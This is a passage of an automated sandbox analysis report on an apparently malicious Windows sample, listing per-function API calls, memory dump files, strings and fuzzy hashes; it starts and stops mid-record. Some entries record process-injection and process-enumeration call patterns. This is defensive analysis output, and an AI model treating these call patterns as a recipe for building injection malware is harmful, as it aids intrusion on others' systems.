                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00FCA3A4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MemoryProcessWrite$AllocVirtual$CreateObjectRemoteSingleThreadWait
                                  • String ID: %s|%s$131$50500$type must be boolean, but is
                                  • API String ID: 2137838514-353184664
                                  • Opcode ID: a83b50cd18a1e8396902d5e7981a5ad13bb5b689f7477443fc30629becc4bcbb
                                  • Instruction ID: e3f7547a75d381d7a345d8701f9efeeb24cf388a6fa4421296c66ed0cf78686e
                                  • Opcode Fuzzy Hash: a83b50cd18a1e8396902d5e7981a5ad13bb5b689f7477443fc30629becc4bcbb
                                  • Instruction Fuzzy Hash: 44231170D0025A8FDB29DF68CA5ABEDBBB0AF15304F1481DCD449AB292D7359E84DF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $+$+Inf$-Inf$Inf$NaN$gfff
                                  • API String ID: 0-2577472133
                                  • Opcode ID: 02ebe34f1d9f11e00c3d01dd3801fce969caef18421b11d9cb40413c1e25f149
                                  • Instruction ID: 9ae9b2c126064c5cacce8df409d832681f2a611382b3a94e3c46f9059991a254
                                  • Opcode Fuzzy Hash: 02ebe34f1d9f11e00c3d01dd3801fce969caef18421b11d9cb40413c1e25f149
                                  • Instruction Fuzzy Hash: A182A0719087818FE726CF2CC55036BBBE9AFDA344F048A5EE8C9EB251D731D9458B42
                                  APIs
                                  • GetFileAttributesExW.KERNEL32(?,00000000,?,?,?), ref: 0108B4B3
                                  • GetLastError.KERNEL32(?,?), ref: 0108B4BD
                                  • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0108B4D4
                                  • GetLastError.KERNEL32(?,?), ref: 0108B4DF
                                  • FindClose.KERNEL32(00000000,?,?), ref: 0108B4EB
                                  • ___std_fs_open_handle@16.LIBCPMT ref: 0108B5A4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
                                  • String ID:
                                  • API String ID: 2340820627-0
                                  • Opcode ID: 214db01cf8efa2b5a4cf540414de4f5877bff231e373008514d394324f56c90d
                                  • Instruction ID: fe833c3395b50606768ac96463df6d6d2c0f737bd8f9153c5436105f1d954737
                                  • Opcode Fuzzy Hash: 214db01cf8efa2b5a4cf540414de4f5877bff231e373008514d394324f56c90d
                                  • Instruction Fuzzy Hash: DB71A274A046199FEBA0DF6CC884BAEB7F8BF09314F0442A5E9D5E3390DB749950CB50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: BINARY$MATCH$NOCASE$RTRIM$automatic extension loading failed: %s$no such vfs: %s$sqlite_rename_table
                                  • API String ID: 0-1885142750
                                  • Opcode ID: de26d0bcfc31b70d1bf161fe9e6984c5583a95101e89636aff8431d630c29a59
                                  • Instruction ID: 8d3f743fd82346fc34dc6862d1acfb1a704634ae0a3df64317d26202a6bfb759
                                  • Opcode Fuzzy Hash: de26d0bcfc31b70d1bf161fe9e6984c5583a95101e89636aff8431d630c29a59
                                  • Instruction Fuzzy Hash: 710215B0B04701DBE730AF29D845B6A7BE5BF50B04F04446EE5C69FA81E7BAE544CB81
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,010AE1D6,?,?), ref: 010ADF5D
                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,010AE1D6,?,?), ref: 010ADF86
                                  • GetACP.KERNEL32(?,?,010AE1D6,?,?), ref: 010ADF9B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 66c7ff13b031d64c8ec0ed2631c2acc3c591627d493c914b465d1c6b0a5c538e
                                  • Instruction ID: 31e16256fd2ca432c01d5580e1991b319b1fdbb722981c6820a394bbf46dc337
                                  • Opcode Fuzzy Hash: 66c7ff13b031d64c8ec0ed2631c2acc3c591627d493c914b465d1c6b0a5c538e
                                  • Instruction Fuzzy Hash: 9721C572600100EAEB719FD8C940BDB77EEEF40A50BC644A4EACAD7915E732DD40C750
                                  APIs
                                    • Part of subcall function 00FBA400: GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA478
                                    • Part of subcall function 00FBA400: GetProcAddress.KERNEL32(00000000,?), ref: 00FBA483
                                    • Part of subcall function 00FBA400: GetProcessHeap.KERNEL32(?,?), ref: 00FBA490
                                    • Part of subcall function 00FBA400: RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 00FBA4A6
                                    • Part of subcall function 00FBA400: RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 00FBA4DC
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FBAC0E
                                  • Process32First.KERNEL32(00000000,?), ref: 00FBAC1E
                                  • Process32Next.KERNEL32(00000000,?), ref: 00FBAC3B
                                  • Process32Next.KERNEL32(00000000,?), ref: 00FBAD6A
                                  • CloseHandle.KERNEL32(00000000), ref: 00FBAD7F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: HeapProcess32$AllocateHandleNext$AddressCloseCreateFirstModuleProcProcessSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 4286562329-0
                                  • Opcode ID: bcdf8ad49e9b56b88ca520ae1b0b80f3d806d3ac4fa615f546a92603bf3eb013
                                  • Instruction ID: c5356a4800762410226ee9a714590deef93af1ffa39cec7b3786dfd50ffc4cb3
                                  • Opcode Fuzzy Hash: bcdf8ad49e9b56b88ca520ae1b0b80f3d806d3ac4fa615f546a92603bf3eb013
                                  • Instruction Fuzzy Hash: 00923431D002488FDF19CFA8C8947FEBB75EF56310F288299D4956B282DB709A46DF91
                                  APIs
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00FC478E
                                  • __Mtx_unlock.LIBCPMT ref: 00FC489B
                                    • Part of subcall function 00FBAB50: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FBAC0E
                                    • Part of subcall function 00FBAB50: Process32First.KERNEL32(00000000,?), ref: 00FBAC1E
                                    • Part of subcall function 00FBAB50: Process32Next.KERNEL32(00000000,?), ref: 00FBAC3B
                                  • CopyFileA.KERNEL32(?,?,00000000), ref: 00FC47AE
                                  • __Mtx_unlock.LIBCPMT ref: 00FC49A1
                                  • __Mtx_unlock.LIBCPMT ref: 00FC4A6C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Mtx_unlock$CopyFileProcess32$CreateFirstNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 3445113079-0
                                  • Opcode ID: c503fd60b840f920cdda555973546c84317f5b911cba2896da3657d2b602fc1e
                                  • Instruction ID: 287753f846746f3d7191f2261d3978641ea4adef81b12896657c17cce8b285f4
                                  • Opcode Fuzzy Hash: c503fd60b840f920cdda555973546c84317f5b911cba2896da3657d2b602fc1e
                                  • Instruction Fuzzy Hash: 00323731E0020A8FDF08DF68DD95BEEBBB1EF55314F24425CE845AB281D735AA45DBA0
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 010AE1A8
                                  • IsValidCodePage.KERNEL32(?), ref: 010AE1E6
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 010AE1F9
                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 010AE241
                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 010AE25C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                  • String ID:
                                  • API String ID: 415426439-0
                                  • Opcode ID: d069feaddb42457ec7347d23ab850e7fa883fa5b8ebe71535427d85606a8f21e
                                  • Instruction ID: 4f75176efde3fa276a65ab4695cc96c852ea2592832df436dac37843e585638f
                                  • Opcode Fuzzy Hash: d069feaddb42457ec7347d23ab850e7fa883fa5b8ebe71535427d85606a8f21e
                                  • Instruction Fuzzy Hash: F5514F71A00216AFEF60DBE9CC40AEE77F8BF18700F844569E695EB190E770A9448B61
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,?), ref: 00FBA478
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00FBA483
                                  • GetProcessHeap.KERNEL32(?,?), ref: 00FBA490
                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00010000), ref: 00FBA4A6
                                  • RtlAllocateHeap.NTDLL(?,00000000,00010000), ref: 00FBA4DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Allocate$AddressHandleModuleProcProcess
                                  • String ID:
                                  • API String ID: 3330366720-0
                                  • Opcode ID: 699d6cd2b7d54bacb5f651d80f573f46a2d690d71b62313c003cefaaaf5c93ef
                                  • Instruction ID: 82548c7bd1d31a82e6f7c9527a50d1d0bb22c6c8abd2d6f982654a1b397f4497
                                  • Opcode Fuzzy Hash: 699d6cd2b7d54bacb5f651d80f573f46a2d690d71b62313c003cefaaaf5c93ef
                                  • Instruction Fuzzy Hash: 4C411831E00349ABDB20CFEDDC88BDEBBB8EF49314F1041A9EA48E7241D6755944CBA5
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetACP.KERNEL32(?,?,?,?,?,?,010A0A83,?,?,?,?,?,-00000050,?,?,?), ref: 010AD7EA
                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,010A0A83,?,?,?,?,?,-00000050,?,?), ref: 010AD821
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 010AD984
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$CodeInfoLocalePageValid
                                  • String ID: utf8
                                  • API String ID: 607553120-905460609
                                  • Opcode ID: c7798602998078358ed359218afa84acff8dd0189433d66137456876b9ae6ec5
                                  • Instruction ID: dba5ade4c47f9c1be4a42df1fd7a0b77be4aa8c219bdc0ac426bc130da98debc
                                  • Opcode Fuzzy Hash: c7798602998078358ed359218afa84acff8dd0189433d66137456876b9ae6ec5
                                  • Instruction Fuzzy Hash: 0F71F771600207AAE725ABF8CC45BEA77E8EF04700F84056AE6C5DB981EB74E940C760
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4459329126.0000000001ADB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_Lisect_AVT_24003_G1A_89.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: /Kim$/Kim$type must be number, but is $type must be string, but is
                                  • API String ID: 0-1144537432
                                  • Opcode ID: 7e103591d162a2bbf9b435da3d6c8b71be6df9c7b4bb9153d7b8b47afbbf9314
                                  • Instruction ID: 7597c7086c72ae3863c770791a109bee3c24ce222827560cc5acfb11ad3672e5
                                  • Opcode Fuzzy Hash: 7e103591d162a2bbf9b435da3d6c8b71be6df9c7b4bb9153d7b8b47afbbf9314
                                  • Instruction Fuzzy Hash: 99910372F002199FCB08CFACD8917DAB7E9EB88310F1482AEE94997395D6755D05CB80
                                  APIs
                                    • Part of subcall function 010A364B: GetLastError.KERNEL32(?,?,0109DD18,?,?,00000003,01092013,?,01091F82,?,00000016,01092191), ref: 010A364F
                                    • Part of subcall function 010A364B: SetLastError.KERNEL32(00000000,00000016,01092191,?,?,?,?,?,00000000,?,?,?,?,?,?,00FB2D8D), ref: 010A36F1
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADB9C
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADBE6
                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 010ADCAC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.4457717273.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4457766837.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458084066.0000000001102000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001112000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.000000000125C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000012EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.0000000001608000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4458131952.00000000018B0000.00000040.00000001.01000000.00000003.sdmpDownload File
